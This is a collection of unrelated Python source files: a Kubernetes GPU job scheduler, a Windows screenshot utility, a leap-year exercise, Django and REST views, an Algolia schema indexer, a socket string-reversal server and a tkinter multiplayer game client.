jobGPU = int(jobParams["resourcegpu"])
currentGPU = 0
for user in cluster_status["user_status"]:
if user["userName"] == jobUser:
currentGPU = int(user["userGPU"])
if currentGPU == 0 or currentGPU + jobGPU <= 4:
ApproveJob(job)
UnusualJobs = {}
def UpdateJobStatus(job):
dataHandler = DataHandler()
jobParams = json.loads(base64.b64decode(job["jobParams"]))
if job["jobStatus"] == "scheduling" and jobParams["jobtrainingtype"] == "PSDistJob":
launch_ps_dist_job(jobParams)
jobPath,workPath,dataPath = GetStoragePath(jobParams["jobPath"],jobParams["workPath"],jobParams["dataPath"])
localJobPath = os.path.join(config["storage-mount-path"],jobPath)
logPath = os.path.join(localJobPath,"logs/joblog.txt")
result, detail = k8sUtils.GetJobStatus(job["jobId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatusDetail",base64.b64encode(json.dumps(detail)))
logging.info("job %s status: %s,%s" % (job["jobId"], result, json.dumps(detail)))
jobDescriptionPath = os.path.join(config["storage-mount-path"], job["jobDescriptionPath"]) if "jobDescriptionPath" in job else None
if "userId" not in jobParams:
jobParams["userId"] = "0"
if result.strip() == "Succeeded":
joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","finished")
if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
k8sUtils.kubectl_delete(jobDescriptionPath)
elif result.strip() == "Running":
if job["jobStatus"] != "running":
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","running")
if "interactivePort" in jobParams:
serviceAddress = k8sUtils.GetServiceAddress(job["jobId"])
serviceAddress = base64.b64encode(json.dumps(serviceAddress))
dataHandler.UpdateJobTextField(job["jobId"],"endpoints",serviceAddress)
elif result.strip() == "Failed":
printlog("Job %s fails, cleaning..." % job["jobId"])
joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","failed")
dataHandler.UpdateJobTextField(job["jobId"],"errorMsg",detail)
if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
k8sUtils.kubectl_delete(jobDescriptionPath)
elif result.strip() == "Unknown":
if job["jobId"] not in UnusualJobs:
UnusualJobs[job["jobId"]] = datetime.datetime.now()
elif (datetime.datetime.now() - UnusualJobs[job["jobId"]]).seconds > 300:
del UnusualJobs[job["jobId"]]
retries = dataHandler.AddandGetJobRetries(job["jobId"])
if retries >= 5:
printlog("Job %s fails for more than 5 times, abort" % job["jobId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","error")
dataHandler.UpdateJobTextField(job["jobId"],"errorMsg","cannot launch the job.")
if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
k8sUtils.kubectl_delete(jobDescriptionPath)
else:
printlog("Job %s fails in Kubernetes, delete and re-submit the job. Retries %d" % (job["jobId"] , retries))
SubmitJob(job)
elif result.strip() == "PendingHostPort":
printlog("Cannot find host ports for job :%s, re-launch the job with different host ports " % (job["jobId"]))
SubmitJob(job)
if result.strip() != "Unknown" and job["jobId"] in UnusualJobs:
del UnusualJobs[job["jobId"]]
def UpdateDistJobStatus(job):
dataHandler = DataHandler()
jobParams = json.loads(base64.b64decode(job["jobParams"]))
if "userId" not in jobParams:
jobParams["userId"] = "0"
jobPath,workPath,dataPath = GetStoragePath(jobParams["jobPath"],jobParams["workPath"],jobParams["dataPath"])
localJobPath = os.path.join(config["storage-mount-path"],jobPath)
logPath = os.path.join(localJobPath,"logs/joblog.txt")
result, detail = k8sUtils.GetJobStatus(job["jobId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatusDetail",base64.b64encode(detail))
logging.info("job %s status: %s,%s" % (job["jobId"], result, json.dumps(detail)))
jobDescriptionPath = os.path.join(config["storage-mount-path"], job["jobDescriptionPath"]) if "jobDescriptionPath" in job else None
jobId = jobParams["jobId"]
workerPodInfo = k8sUtils.GetPod("distRole=worker,run=" + jobId)
psPodInfo = k8sUtils.GetPod("distRole=ps,run=" + jobId)
if "items" in workerPodInfo and len(workerPodInfo["items"]) == int(jobParams["numpsworker"]) and "items" in psPodInfo and len(psPodInfo["items"]) == int(jobParams["numps"]):
if job["jobStatus"] == "scheduling" :
launch_ps_dist_job(jobParams)
if job["jobStatus"] == "running":
result, detail = GetDistJobStatus(job["jobId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatusDetail",base64.b64encode(detail))
printlog("job %s status: %s" % (job["jobId"], result))
jobDescriptionPath = os.path.join(config["storage-mount-path"], job["jobDescriptionPath"]) if "jobDescriptionPath" in job else None
if result.strip() == "Succeeded":
joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","finished")
if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
k8sUtils.kubectl_delete(jobDescriptionPath)
elif result.strip() == "Running":
joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
if job["jobStatus"] != "running":
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","running")
if "interactivePort" in jobParams:
serviceAddress = k8sUtils.GetServiceAddress(job["jobId"])
serviceAddress = base64.b64encode(json.dumps(serviceAddress))
dataHandler.UpdateJobTextField(job["jobId"],"endpoints",serviceAddress)
elif result.strip() == "Failed":
printlog("Job %s fails, cleaning..." % job["jobId"])
joblog_manager.extract_job_log(job["jobId"],logPath,jobParams["userId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","failed")
dataHandler.UpdateJobTextField(job["jobId"],"errorMsg",detail)
if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
k8sUtils.kubectl_delete(jobDescriptionPath)
elif result.strip() == "Unknown":
if job["jobId"] not in UnusualJobs:
UnusualJobs[job["jobId"]] = datetime.datetime.now()
elif (datetime.datetime.now() - UnusualJobs[job["jobId"]]).seconds > 300:
del UnusualJobs[job["jobId"]]
retries = dataHandler.AddandGetJobRetries(job["jobId"])
if retries >= 5:
printlog("Job %s fails for more than 5 times, abort" % job["jobId"])
dataHandler.UpdateJobTextField(job["jobId"],"jobStatus","error")
dataHandler.UpdateJobTextField(job["jobId"],"errorMsg","cannot launch the job.")
if jobDescriptionPath is not None and os.path.isfile(jobDescriptionPath):
k8sUtils.kubectl_delete(jobDescriptionPath)
else:
printlog("Job %s fails in Kubernetes, delete and re-submit the job. Retries %d" % (job["jobId"] , retries))
SubmitJob(job)
if result.strip() != "Unknown" and job["jobId"] in UnusualJobs:
del UnusualJobs[job["jobId"]]
pass
def run_dist_cmd_on_pod(podId, cmd, outputfile):
remotecmd = "exec %s -- %s" % (podId,cmd)
print remotecmd
k8sUtils.kubectl_exec_output_to_file(remotecmd,outputfile)
class Kube_RemoteCMD_Thread(threading.Thread):
def __init__(self, jobId, podId, cmd, outputfile):
threading.Thread.__init__(self)
self.jobId = jobId
self.podId = podId
self.cmd = cmd
self.outputfile = outputfile
def run(self):
run_dist_cmd_on_pod(self.podId, self.cmd, self.outputfile)
def launch_ps_dist_job(jobParams):
jobId = jobParams["jobId"]
workerPodInfo = k8sUtils.GetPod("distRole=worker,run=" + jobId)
psPodInfo = k8sUtils.GetPod("distRole=ps,run=" + jobId)
if "items" in workerPodInfo and len(workerPodInfo["items"]) == int(jobParams["numpsworker"]) and "items" in psPodInfo and len(psPodInfo["items"]) == int(jobParams["numps"]):
podStatus = [k8sUtils.check_pod_status(pod) for pod in workerPodInfo["items"] + psPodInfo["items"] ]
if all([status == "Running" for status in podStatus]):
ps_pod_names = [pod["metadata"]["name"] for pod in psPodInfo["items"]]
worker_pod_names = [pod["metadata"]["name"] for pod in workerPodInfo["items"]]
ps_pod_ips = [pod["status"]["podIP"] for pod in psPodInfo["items"]]
worker_pod_ips = [pod["status"]["podIP"] for pod in workerPodInfo["items"]]
ps_num = len(psPodInfo["items"])
worker_num = len(workerPodInfo["items"])
ps_ports = [int(item["metadata"]["labels"]["distPort"]) for item in psPodInfo["items"]]
worker_ports = [int(item["metadata"]["labels"]["distPort"]) for item in workerPodInfo["items"]]
#port range: 30000~31000
#rndList = range(max(1000,ps_num + worker_num))
#random.shuffle(rndList)
#ps_ports = [rndList[i] + 30000 for i in range(ps_num)]
#worker_ports = [rndList[i + ps_num] + 30000 for i in range(worker_num)]
ps_hosts = ",".join(["%s:%s" % (ps_pod_ips[i],ps_ports[i]) for i in range(ps_num)])
worker_hosts = ",".join(["%s:%s" % (worker_pod_ips[i],worker_ports[i]) for i in range(worker_num)])
ps_files = ["/tmp/" + str(uuid.uuid4()) for i in range(ps_num)]
worker_files = ["/tmp/" + str(uuid.uuid4()) for i in range(worker_num)]
ps_cmd = ["%s --ps_hosts=%s --worker_hosts=%s --job_name=ps --task_index=%d 2>&1 | tee %s" % (jobParams["cmd"], ps_hosts,worker_hosts,i,ps_files[i]) for i in range(ps_num)]
worker_cmd = ["%s --ps_hosts=%s --worker_hosts=%s --job_name=worker --task_index=%d 2>&1 | tee %s" % (jobParams["cmd"], ps_hosts,worker_hosts,i,worker_files[i]) for i in range(worker_num)]
for i in range(ps_num):
os.system("mkdir -p %s" % ps_files[i])
ps_files[i] = os.path.join(ps_files[i],"run_dist_job.sh")
with open(ps_files[i], 'w') as f:
f.write(ps_cmd[i] + "\n")
f.close()
if "userId" in jobParams:
os.system("chown -R %s %s" % (jobParams["userId"], ps_files[i]))
remotecmd = "cp %s %s:/opt/run_dist_job.sh" % (ps_files[i],ps_pod_names[i])
k8sUtils.kubectl_exec(remotecmd)
k8sUtils.kubectl_exec("exec %s touch /opt/run_dist_job" % ps_pod_names[i])
for i in range(worker_num):
os.system("mkdir -p %s" % worker_files[i])
worker_files[i] = os.path.join(worker_files[i],"run_dist_job.sh")
with open(worker_files[i], 'w') as f:
f.write(worker_cmd[i] + "\n")
f.close()
if "userId" in jobParams:
os.system("chown -R %s %s" % (jobParams["userId"], worker_files[i]))
remotecmd = "cp %s %s:/opt/run_dist_job.sh" % (worker_files[i],worker_pod_names[i])
k8sUtils.kubectl_exec(remotecmd)
k8sUtils.kubectl_exec("exec %s touch /opt/run_dist_job" % worker_pod_names[i])
dataHandler = DataHandler()
dataHandler.UpdateJobTextField(jobParams["jobId"],"jobStatus","running")
#ps_threads = [Kube_RemoteCMD_Thread(jobId,ps_pod_names[i],ps_cmd[i],ps_logfiles[i]) for i in range(ps_num)]
#worker_threads = [Kube_RemoteCMD_Thread(jobId,worker_pod_names[i],worker_cmd[i],worker_logfiles[i]) for i in range(worker_num)]
#for t in ps_threads:
# t.start()
#for t in worker_threads:
# t.start()
#while (True):
#for t in ps_threads:
# print t.isAlive()
#time.sleep(5)
#cmd = "test"
#thread.start_new_thread( run_dist_cmd_on_pod,
#(workerPodInfo["items"][0]["metadata"]["name"], cmd) )
def create_log( logdir = '/var/log/dlworkspace' ):
if not os.path.exists( logdir ):
os.system("mkdir -p " + logdir )
with open('logging.yaml') as f:
logging_config = yaml.load(f)
f.close()
logging_config["handlers"]["file"]["filename"] = logdir+"/jobmanager.log"
logging.config.dictConfig(logging_config)
def Run():
while True:
try:
config["racks"] = k8sUtils.get_node_labels("rack")
config["skus"] = k8sUtils.get_node_labels("sku")
except Exception as e:
print e
try:
dataHandler = DataHandler()
pendingJobs = dataHandler.GetPendingJobs()
printlog("updating status for %d jobs" % len(pendingJobs))
for job in pendingJobs:
try:
print "Processing job: %s, status: %s" % (job["jobId"], job["jobStatus"])
if job["jobStatus"] == "queued":
SubmitJob(job)
elif job["jobStatus"] == "killing":
KillJob(job)
elif job["jobStatus"] == "scheduling" or job["jobStatus"] == "running" :
UpdateJobStatus(job)
elif job["jobStatus"] == "unapproved" :
AutoApproveJob(job)
except Exception as e:
print e
except Exception as e:
print e
time.sleep(1)
if __name__ == '__main__':
Run()
#print k8sUtils.get_pod_events("d493d41c-45ea-4e85-8ca4-01c3533cd727")
|
# -*- coding: cp936 -*-
import Image
import os, win32gui, win32ui, win32con, win32api
def window_capture(dpath,imagetype = '.jpg'):
'''''
@note: 截屏函数,调用方法window_capture('E:\\') ,参数为指定保存的目录
返回图片文件名,文件名格式:ttt.jpg
'''
hwnd = 0
hwndDC = win32gui.GetWindowDC(hwnd)
mfcDC=win32ui.CreateDCFromHandle(hwndDC)
saveDC=mfcDC.CreateCompatibleDC()
saveBitMap = win32ui.CreateBitmap()
MoniterDev=win32api.EnumDisplayMonitors(None,None)
w = MoniterDev[0][2][2]
h = MoniterDev[0][2][3]
#print w,h #图片大小
saveBitMap.CreateCompatibleBitmap(mfcDC, w, h)
saveDC.SelectObject(saveBitMap)
saveDC.BitBlt((0,0),(w, h) , mfcDC, (0,0), win32con.SRCCOPY)
# cc=time.gmtime()
# bmpname=str(cc[0])+str(cc[1])+str(cc[2])+str(cc[3]+8)+str(cc[4])+str(cc[5])+'.bmp'
bmpname = 'ttt'
saveBitMap.SaveBitmapFile(saveDC, bmpname)
Image.open(bmpname).save(bmpname+imagetype)
os.remove(bmpname)
jpgname=bmpname+imagetype
djpgname=dpath+jpgname
copy_command = "move %s %s" % (jpgname, djpgname)
os.popen(copy_command)
return bmpname+imagetype
def main():
#调用截屏函数
window_capture('E:\\')
if __name__ =="__main__":
main() |
from typing import Any, Optional
class Response:
status: str = 'ok'
def __init__(self, status: Optional[str] = None, **kwargs: Any) -> None:
for key, value in kwargs.items():
setattr(self, key, value)
self.status = status or self.status
|
# Tyler Pettigrew
# CS362-HW1
""""To run this program, an IDE like Pycharm or the command line can be used
command line: run "python Tyler_Pettigrew_hw1.py" in the terminal where the file is located
Pycharm/Other IDE: Use the IDE's internal run function
"""
"""leap_year
Inputs:
year: a positive integer number
Outputs:
If the given year is a leap year based on the given criteria, print that the year is a leap year.
Otherwise, say it isn't
"""
def leap_year(year):
if year % 4 == 0:
if year % 100 == 0:
if year % 400 == 0:
print(year, "is a leap year.")
else:
print(year, "is not a leap year")
else:
print(year, "is a leap year")
else:
print(year, "is not a leap year")
if __name__ == '__main__':
year = input("Enter the year, or 'q' to quit: ")
# If the escape character 'q' is pressed, exit the program
if year.strip().lower() == "q":
exit(0)
# Strip any extra spaces, and try to convert the string to a number. If it fails, reprompt until a correct number
# is given or the user quits
year = year.strip()
while not (year.isnumeric()):
year = input("Year not recognized: Enter the year or q to quit: ")
if year.strip().lower() == "q":
exit(0)
year = abs(int(year.strip()))
leap_year(year)
|
from itertools import groupby
def ones_counter(nums):
return [sum(g) for k, g in groupby(nums) if k]
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404, render
from trivia.models import Question, Choice
from locations.models import Page
from django.urls import reverse
from django.views import generic
import requests
import json
def trivia(request, slug):
"""View function for home page of TRIVIA."""
template_name = 'trivia/game.html'
# Generate counts of some of the main objects
# questions = Question.objects.filter(quiz__slug=slug)
questions = Question.objects.filter(quiz__slug=slug)
choices = Choice.objects.filter(question__quiz__slug=slug).order_by('created')
num_questions = questions.count()
total_points = sum([question.points for question in questions])
context = {
'slug': slug,
'total_points': total_points,
'num_questions': num_questions,
'questions': questions,
'choices': choices,
'error_message': "You didn't select a choice.",
}
# Render the HTML template index.html with the data in the context variable
return render(request, template_name, context=context)
# def game(request, slug):
# questions = Question.objects.filter(quiz__slug=slug)
# choices = Choice.objects.filter(question__quiz__slug=slug).order_by('created')
# total_points = sum([question.points for question in questions])
# num_questions = questions.count()
# # template_name = 'scoreboard/score_board.html'
# template_name = 'trivia/game.html'
# try:
# selected_choices = questions.get(request.POST['choice'])
# except (KeyError, Choice.DoesNotExist):
# context = {
# 'slug': slug,
# 'total_points': total_points,
# 'num_questions': num_questions,
# 'questions': questions[:1],
# 'choices': choices,
# 'error_message': "You didn't select a choice.",
# }
# return render(request, template_name, context=context)
# else:
# if selected_choices.correct:
# # Always return an HttpResponseRedirect after successfully dealing
# # with POST data. This prevents data from being posted twice if a
# # user hits the Back button.
# return HttpResponseRedirect(reverse('highscore'))
|
from rest_framework import serializers
from scuba_dive_data.models import ScubaDiveData
class ScubaDiveDataSerializer(serializers.ModelSerializer):
class Meta:
model = ScubaDiveData
fields = '__all__'
|
import json
import os
from algoliasearch import algoliasearch
## Algolia Credentials
client = algoliasearch.Client("7EK9KHJW8M", os.environ['ALGOLIA_API_KEY'])
index = client.init_index('schema')
## Load plotschema.json
# Note _data/plotschema.json is updated upon each deploy
p = json.load(open('_data/plotschema.json'))
schema = []
## Data Level 1: Traces
# Add trace dictionaries to schema array.
# The trace dictionary include name: trace name, permalink: reference/#trace-name, and description if applicable.
for i in p['schema']['traces']:
trace = {}
trace ['name'] = i
trace ['permalink'] = 'reference/#'+i
if p['schema']['traces'][i]['meta']:
trace ['description'] = (p['schema']['traces'][i]['meta']['description']).replace('*', '"')
else: pass
schema.append(trace)
## Data Level 2: Nested Attributes
for i in p['schema']['traces']:
for att1 in p['schema']['traces'][i]['attributes']:
if not any(value in att1 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
try:
attribute = {}
attribute ['name'] = i+' > '+att1
attribute ['permalink'] = 'reference/#'+i+'-'+att1
attribute ['description'] = (p['schema']['traces'][i]['attributes'][att1]['description']).replace('*', '"')
schema.append(attribute)
except:
attribute = {}
attribute ['name'] = i+' > '+att1
attribute ['permalink'] = 'reference/#'+i+'-'+att1
attribute ['description'] = 'Properties for '+att1
schema.append(attribute)
for att2 in p['schema']['traces'][i]['attributes'][att1]:
if not any(value in att2 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
try:
if isinstance(p['schema']['traces'][i]['attributes'][att1][att2], dict):
try:
attribute = {}
attribute ['name'] = i+' > '+att1+' > '+att2
attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2
attribute ['description'] = (p['schema']['traces'][i]['attributes'][att1][att2]['description']).replace('*', '"')
schema.append(attribute)
except:
attribute = {}
attribute ['name'] = i+' > '+att1+' > '+att2
attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2
attribute ['description'] = 'Properties for '+att2
schema.append(attribute)
except:
pass
try:
for att3 in p['schema']['traces'][i]['attributes'][att1][att2]:
if not any(value in att3 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
try:
if isinstance(p['schema']['traces'][i]['attributes'][att1][att2][att3], dict):
try:
attribute = {}
attribute ['name'] = i+' > '+att1+' > '+att2+' > '+att3
attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2+'-'+att3
attribute ['description'] = (p['schema']['traces'][i]['attributes'][att1][att2][att3]['description']).replace('*', '"')
schema.append(attribute)
except:
attribute = {}
attribute ['name'] = i+' > '+att1+' > '+att2+' > '+att3
attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2+'-'+att3
attribute ['description'] = 'Properties for '+att3
schema.append(attribute)
except:
pass
try:
for att4 in p['schema']['traces'][i]['attributes'][att1][att2][att3]:
if not any(value in att4 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
try:
if isinstance(p['schema']['traces'][i]['attributes'][att1][att2][att3][att4], dict):
try:
attribute = {}
attribute ['name'] = i+' > '+att1+' > '+att2+' > '+att3+' > '+att4
attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2+'-'+att3+'-'+att4
attribute ['description'] = (p['schema']['traces'][i]['attributes'][att1][att2][att3][att4]['description']).replace('*', '"')
schema.append(attribute)
except:
attribute = {}
attribute ['name'] = i+' > '+att1+' > '+att2+' > '+att3+' > '+att4
attribute ['permalink'] = 'reference/#'+i+'-'+att1+'-'+att2+'-'+att3+'-'+att4
attribute ['description'] = 'Properties for '+att4
schema.append(attribute)
except:
pass
except:
pass
except:
pass
## Layout Attributes
for att1 in p['schema']['layout']['layoutAttributes']:
if not any(value in att1 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
try:
attribute = {}
attribute ['name'] = 'Layout > '+att1
attribute ['permalink'] = 'reference/#layout-'+att1
attribute ['description'] = (p['schema']['layout']['layoutAttributes'][att1]['description']).replace('*', '"')
schema.append(attribute)
except:
attribute = {}
attribute ['name'] = 'Layout > '+att1
attribute ['permalink'] = 'reference/#layout-'+att1
attribute ['description'] = 'Properties for '+att1
schema.append(attribute)
for att2 in p['schema']['layout']['layoutAttributes'][att1]:
if not any(value in att2 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
try:
if isinstance(p['schema']['layout']['layoutAttributes'][att1][att2], dict):
try:
attribute = {}
attribute ['name'] = 'Layout > '+att1+' > '+att2
attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2
attribute ['description'] = (p['schema']['layout']['layoutAttributes'][att1][att2]['description']).replace('*', '"')
schema.append(attribute)
except:
attribute = {}
attribute ['name'] = 'Layout > '+att1+' > '+att2
attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2
attribute ['description'] = 'Properties for '+att2
schema.append(attribute)
except:
pass
try:
for att3 in p['schema']['layout']['layoutAttributes'][att1][att2]:
if not any(value in att3 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
if isinstance(p['schema']['layout']['layoutAttributes'][att1][att2][att3], dict):
try:
attribute = {}
attribute ['name'] = 'Layout > '+att1+' > '+att2+' > '+att3
attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2+'-'+att3
attribute ['description'] = (p['schema']['layout']['layoutAttributes'][att1][att2][att3]['description']).replace('*', '"')
schema.append(attribute)
except:
attribute = {}
attribute ['name'] = 'Layout > '+att1+' > '+att2+' > '+att3
attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2+'-'+att3
attribute ['description'] = 'Properties for '+att3
schema.append(attribute)
try:
for att4 in p['schema']['layout']['layoutAttributes'][att1][att2][att3]:
if not any(value in att4 for value in ("src", "_deprecated", "impliedEdits", "uid", "editType")):
if isinstance(p['schema']['layout']['layoutAttributes'][att1][att2][att3][att4], dict):
try:
attribute = {}
attribute ['name'] = 'Layout > '+att1+' > '+att2+' > '+att3+' > '+att4
attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2+'-'+att3+'-'+att4
attribute ['description'] = (p['schema']['layout']['layoutAttributes'][att1][att2][att3][att4]['description']).replace('*', '"')
schema.append(attribute)
except:
attribute = {}
attribute ['name'] = 'Layout > '+att1+' > '+att2+' > '+att3+' > '+att4
attribute ['permalink'] = 'reference/#layout-'+att1+'-'+att2+'-'+att3+'-'+att4
attribute ['description'] = 'Properties for '+att4
schema.append(attribute)
except:
pass
except:
pass
## Send to Algolia
index.clear_index()
index.add_objects(schema)
|
from Vector2 import Vector2
def getAroundingTiles(tile, map):
loc = tile.Position
aroundingLocations = [(loc.X-1, loc.Y-1), (loc.X, loc.Y-1), (loc.X+1, loc.Y-1),
(loc.X-1, loc.Y), (loc.X+1, loc.Y),
(loc.X-1, loc.Y+1), (loc.X, loc.Y+1), (loc.X+1, loc.Y+1)]
# filter locations outside the board
return [map.GetTile(Vector2(X, Y)) for (X, Y) in aroundingLocations if 0 <= X <= 17 and 0 <= Y <= 17]
|
from socket import *
import sys
def server_tcp_negotiation(welcomingSocket, req_code):
while 1:
# create TCP connection between clientSocket and
# connectionSocket
connectionSocket, addr = welcomingSocket.accept()
# print("TCP CONNECTION REQUEST ACCEPTED")
# receive <req_code> from client
recv_code = connectionSocket.recv(1024)
# print("CLIENT REQUEST CODE RECEIVED: " + recv_code)
# verify <req_code>
if recv_code == str(req_code):
# print("CLIENT REQUEST CODE VERIFIED")
# create server socket (UDP) for receiving <msg>
recvSocket = socket(AF_INET, SOCK_DGRAM)
# assign port number <r_port> to recvSocket
recvSocket.bind(('',0))
r_port = recvSocket.getsockname()[1]
# send <r_port> to client using TCP connection
connectionSocket.send(str(r_port))
# print("TRANSACTION PORT NUMBER SENT: " + str(r_port))
connectionSocket.close()
return recvSocket
# client will close the TCP connection after receving
# <r_port>
else:
# client fails to send the intended <req_code>,
# inform client and close the TCP connection
# print("INVALID CLIENT REQUEST CODE")
connectionSocket.send("-1")
connectionSocket.close()
# print("TCP CONNECTION CLOSED")
def server_udp_transaction(recvSocket):
#receive <msg> from client
msg, clientAddress = recvSocket.recvfrom(2048)
# print("CLIENT MESSAGE RECEIVED: " + msg)
#reverse <msg>
reversedMsg = msg[::-1]
#send reversed <msg> to client
recvSocket.sendto(reversedMsg, clientAddress)
# print("REVERSED MESSAGE SENT")
#close the UDP connection"
recvSocket.close()
def main():
# check command line argument
try:
req_code = int(sys.argv[1])
except IndexError:
print("ERROR: MISSING REQUEST CODE")
sys.exit(1)
except ValueError:
print("ERROR: REQUEST CODE MUST BE INTEGER")
sys.exit(1)
# create welcoming socket (TCP)
welcomingSocket = socket(AF_INET, SOCK_STREAM)
# assign port number <n_port> to welcoming socket
welcomingSocket.bind(('',0))
n_port = welcomingSocket.getsockname()[1]
# print out <n_port> to screen and into "port.txt"
print("SERVER_PORT=" + str(n_port))
f = open("port.txt","w")
f.write("SERVER_PORT=" + str(n_port))
f.close()
# listen for TCP connection requests from the client
welcomingSocket.listen(1)
# print("WAITING FOR TCP CONNECTION REQUEST")
while 1:
recvSocket = server_tcp_negotiation(welcomingSocket, req_code)
server_udp_transaction(recvSocket)
if __name__ == "__main__":
main()
|
import urllib
import xml.etree.ElementTree as ET
url = raw_input('Enter url:')
url1 = urllib.urlopen(url).read()
tree = ET.fromstring(url1)
lst= []
lst1 = []
lst = tree.findall('comments/comment')
#print 'count:',len(lst)
for item in lst:
#print 'Name',item.find('name').text
lst1.append(int(item.find('count').text))
print sum(lst1) |
class Exception:
def __init__(self, type, description, line, column):
self.type = type
self.description = description
self.line = line
self.column = column
def toString(self):
return self.type + ' - '+self.description+' ['+str(self.line)+' , '+str(self.column)+']'
def getType(self):
return self.type
def getDescription(self):
return self.description
def getLine(self):
return self.line
def getColumn(self):
return self.column |
from CallBackOperator import CallBackOperator
class PlateauTimeCallBackOperator(CallBackOperator):
def __init__(self, window, model, value_range):
super().__init__(window, model, value_range)
# overridden
def init_slider(self):
self.slider = self.window.PlateauTimehorizontalSlider
# overridden
def init_line_edit(self):
self.line_edit = self.window.PlateauTimelineEdit
# overridden
def ConnectCallBack(self):
self.SynchronizeSliderandText()
# overridden
def value_changed(self, val):
self.model.PlateauTime = val |
#!/usr/bin/python3 # This is python_client1.py file
import socket
import threading
from time import sleep
import pickle
import tkinter as tk
from tkinter import messagebox
import re
import random
from client import Client
# -------------------------------------------------------------------------------------------------------- #
# 通信
# メッセージを送信
def send_message(msg):
soc.send(msg.encode("ascii"))
# オブジェクトを送信
def send_object(obj):
soc.send(pickle.dumps(obj))
# メッセージを受信
def receive_message():
msg = soc.recv(1024).decode("ascii")
return msg
# オブジェクトを受信
def receive_object():
obj = pickle.loads(soc.recv(16384))
return obj
# ------------------------------------------------------------------------------------------------------- #
# GUI
def start_window():
print("start window")
def start_game():
name = name_form.get()
if name == "":
name = "GuestUser" + str(random.randint(0, 100001))
client.set_name(name)
send_message("system_start")
send_object(client)
main_frame.destroy()
part_window()
main_frame = tk.Frame(root)
main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
label1 = tk.Label(main_frame, text="ゲーム内で表示されるユーザ名を入力してください。")
label2 = tk.Label(main_frame, text="name")
label1.pack()
label2.place(relx=0.39, rely=0.39)
name_form = tk.Entry(main_frame)
name_form.place(relx=0.39, rely=0.43, relwidth=0.25, relheight=0.05)
sign_in_btn = tk.Button(main_frame, text="start", command=start_game)
sign_in_btn.place(relx=0.48, rely=0.5, relwidth=0.07, relheight=0.05)
def part_window():
def select_room(part):
client.enter(part)
print(part.number)
main_frame.destroy()
section_window(part)
def back():
start_window()
main_frame = tk.Frame(root)
main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
label1 = tk.Label(main_frame, text="Partを選択してください。")
label1.pack()
button1 = tk.Button(main_frame, text="Part" + str(rooms[0].number), command=lambda: select_room(rooms[0]))
button2 = tk.Button(main_frame, text="Part" + str(rooms[1].number), command=lambda: select_room(rooms[1]))
button3 = tk.Button(main_frame, text="Part" + str(rooms[2].number), command=lambda: select_room(rooms[2]))
button1.place(relx=0.05, rely=0.2, relwidth=0.3, relheight=0.5)
button2.place(relx=0.35, rely=0.2, relwidth=0.3, relheight=0.5)
button3.place(relx=0.65, rely=0.2, relwidth=0.3, relheight=0.5)
back_button = tk.Button(main_frame, text="戻る", command=back)
back_button.place(relx=0.95, rely=0.95, relwidth=0.05, relheight=0.05)
def section_window(part):
def select_room(section):
main_frame.destroy()
client.enter(section)
print(section.number)
part_section_window(section)
def back():
client.leave()
part_window()
main_frame = tk.Frame(root)
main_frame.place(relx=0, rely=0, relwidth=1, relheight=1)
label1 = tk.Label(main_frame, text="Sectionを選択してください。")
label1.pack()
button1 = tk.Button(main_frame, text="Section" + str(part.sections[0].number),
command=lambda: select_room(part.sections[0]))
button1.place(relx=0.04, rely=0.05, relwidth=0.23, relheight=0.3)
button2 = tk.Button(main_frame, text="Section" + str(part.sections[1].number),
command=lambda: select_room(part.sections[1]))
button2.place(relx=0.27, rely=0.05, relwidth=0.23, relheight=0.3)
button3 = tk.Button(main_frame, text="Section" + str(part.sections[2].number),
command=lambda: select_room(part.sections[2]))
button3.place(relx=0.5, rely=0.05, relwidth=0.23, relheight=0.3)
button4 = tk.Button(main_frame, text="Section" + str(part.sections[3].number),
command=lambda: select_room(part.sections[3]))
button4.place(relx=0.73, rely=0.05, relwidth=0.23, relheight=0.3)
if len(part.sections) > 4:
button5 = tk.Button(main_frame, text="Section" + str(part.sections[4].number),
command=lambda: select_room(part.sections[4]))
button5.place(relx=0.04, rely=0.35, relwidth=0.23, relheight=0.3)
button6 = tk.Button(main_frame, text="Section" + str(part.sections[5].number),
command=lambda: select_room(part.sections[5]))
button6.place(relx=0.27, rely=0.35, relwidth=0.23, relheight=0.3)
button7 = tk.Button(main_frame, text="Section" + str(part.sections[6].number),
command=lambda: select_room(part.sections[6]))
